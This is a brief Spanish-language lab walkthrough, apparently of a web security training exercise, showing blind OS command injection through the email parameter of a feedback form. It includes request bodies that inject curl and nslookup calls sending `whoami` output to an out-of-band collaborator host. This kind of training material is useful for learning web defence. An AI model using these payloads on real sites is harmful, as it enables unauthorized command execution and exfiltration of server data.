Blind OS command injection with out-of-band data exfiltration
![[20251009020220.png]](/assets/20251009020220.BdOnSFDt.png)
En el sitio web encontraremos un apartado de enviar nuestro feedback.
![[20251009020247.png]](/assets/20251009020247.C8f300EO.png)
Interceptando el trafico observaremos que en el parámetro de email podemos agregar un ; y ejecutar comandos.
![[20251009020427.png]](/assets/20251009020427.BGev42qR.png)
Primer método:
Al tener una ejecución ciega, podemos enviarnos un curl.
c
csrf=OLjvAhI1q9Pf4Sbvqvrx67v5s3fGqR1r&name=test&email=x;curl+http://m9wrlh9o10o2nljr29ztnwbfl6rxft3i.oastify.com/`whoami`;&subject=test&message=test![[20251009020505.png]](/assets/20251009020505.CETcABbX.png)
Segundo Método
En este caso podremos usar:
c
`whoami`Por lo que podemos enviar las siguientes solicitudes:
c
csrf=OLjvAhI1q9Pf4Sbvqvrx67v5s3fGqR1r&name=test&email=x;nslookup+`whoami`.m9wrlh9o10o2nljr29ztnwbfl6rxft3i.oastify.com/`whoami`;&subject=test&message=testPor lo que podemos ver que se puede ejecutar comandos.
![[20251009021038.png]](/assets/20251009021038.B17oR9SQ.png)